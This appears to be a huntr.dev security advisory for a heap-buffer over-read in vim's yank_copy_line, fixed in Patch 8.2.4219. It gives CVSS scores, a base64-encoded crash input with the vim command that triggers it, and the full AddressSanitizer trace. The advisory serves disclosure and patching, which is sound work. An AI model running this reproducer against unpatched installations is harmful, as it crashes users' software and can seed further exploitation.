Heap-based Buffer Overflow in vim/vim

2022-01-2718:59:11

knnikita

www.huntr.dev

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

0.001 Low

EPSS

Percentile

42.0%

JSON

Description

Heap-buffer-overflow on read in yank_copy_line

This issue was created to separate this one and was fixed with Patch 8.2.4219.

Proof of Concept

Steps to reproduce:

echo -n c2lsIW5vcm0wbxSA/zAWenk= | base64 -d &gt; heap_ow_poc3

vim -u NONE -i NONE -n -X -Z -e -m -s -S heap_ow_poc3 -c :qa!

Sanitizer output

==1937==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000722f at pc 0x000000c35e3a bp 0x7ffcb4567010 sp 0x7ffcb4567008
READ of size 1 at 0x60200000722f thread T0
    #0 0xc35e39 in yank_copy_line /home/presler/fuzzing/vim_sanitized/src/register.c:1477:9
    #1 0xc30874 in op_yank /home/presler/fuzzing/vim_sanitized/src/register.c:1217:7
    #2 0xa7bffa in do_pending_operator /home/presler/fuzzing/vim_sanitized/src/ops.c:4027:9
    #3 0x9fef02 in normal_cmd /home/presler/fuzzing/vim_sanitized/src/normal.c:1146:2
    #4 0x76d4dc in exec_normal /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c
    #5 0x76d33d in exec_normal_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:8601:5
    #6 0x76cc2a in ex_normal /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:8519:6
    #7 0x740d0e in do_one_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:2573:2
    #8 0x73775f in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:993:17
    #9 0xc751a1 in do_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1512:5
    #10 0xc729d8 in cmd_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1098:14
    #11 0xc72817 in ex_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1124:2
    #12 0x740d0e in do_one_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:2573:2
    #13 0x73775f in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:993:17
    #14 0x73af81 in do_cmdline_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:587:12
    #15 0x1198eca in exe_commands /home/presler/fuzzing/vim_sanitized/src/main.c:3091:2
    #16 0x1196069 in vim_main2 /home/presler/fuzzing/vim_sanitized/src/main.c:774:2
    #17 0x118fde6 in main /home/presler/fuzzing/vim_sanitized/src/main.c:426:12
    #18 0x7fc84b9c50b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #19 0x41db2d in _start (/home/presler/fuzzing/vim_sanitized/src/vim+0x41db2d)

0x60200000722f is located 1 bytes to the left of 2-byte region [0x602000007230,0x602000007232)
allocated by thread T0 here:
    #0 0x49626d in malloc (/home/presler/fuzzing/vim_sanitized/src/vim+0x49626d)
    #1 0x4c5c67 in lalloc /home/presler/fuzzing/vim_sanitized/src/alloc.c:248:11
    #2 0x4c5c3d in alloc /home/presler/fuzzing/vim_sanitized/src/alloc.c:151:12
    #3 0x8aaf87 in set_indent /home/presler/fuzzing/vim_sanitized/src/indent.c:682:12
    #4 0xa50bca in shift_line /home/presler/fuzzing/vim_sanitized/src/ops.c:269:8
    #5 0x8b42e4 in change_indent /home/presler/fuzzing/vim_sanitized/src/indent.c:1302:2
    #6 0x643eea in ins_shift /home/presler/fuzzing/vim_sanitized/src/edit.c
    #7 0x63ae2f in edit /home/presler/fuzzing/vim_sanitized/src/edit.c:956:6
    #8 0xa3f602 in invoke_edit /home/presler/fuzzing/vim_sanitized/src/normal.c:7285:9
    #9 0xa40d1f in n_opencmd /home/presler/fuzzing/vim_sanitized/src/normal.c:6544:6
    #10 0xa27858 in nv_open /home/presler/fuzzing/vim_sanitized/src/normal.c:7664:2
    #11 0x9fedf7 in normal_cmd /home/presler/fuzzing/vim_sanitized/src/normal.c:1120:5
    #12 0x76d4dc in exec_normal /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c
    #13 0x76d33d in exec_normal_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:8601:5
    #14 0x76cc2a in ex_normal /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:8519:6
    #15 0x740d0e in do_one_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:2573:2
    #16 0x73775f in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:993:17
    #17 0xc751a1 in do_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1512:5
    #18 0xc729d8 in cmd_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1098:14
    #19 0xc72817 in ex_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1124:2
    #20 0x740d0e in do_one_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:2573:2
    #21 0x73775f in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:993:17
    #22 0x73af81 in do_cmdline_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:587:12
    #23 0x1198eca in exe_commands /home/presler/fuzzing/vim_sanitized/src/main.c:3091:2
    #24 0x1196069 in vim_main2 /home/presler/fuzzing/vim_sanitized/src/main.c:774:2
    #25 0x118fde6 in main /home/presler/fuzzing/vim_sanitized/src/main.c:426:12
    #26 0x7fc84b9c50b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/presler/fuzzing/vim_sanitized/src/register.c:1477:9 in yank_copy_line
Shadow bytes around the buggy address:
  0x0c047fff8df0: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c047fff8e00: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fd
  0x0c047fff8e10: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fd
  0x0c047fff8e20: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c047fff8e30: fa fa fd fd fa fa fd fa fa fa 01 fa fa fa 00 00
=&gt;0x0c047fff8e40: fa fa 01 fa fa[fa]02 fa fa fa 05 fa fa fa fd fa
  0x0c047fff8e50: fa fa 02 fa fa fa 02 fa fa fa 00 fa fa fa 02 fa
  0x0c047fff8e60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8e70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8e80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8e90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==1937==ABORTING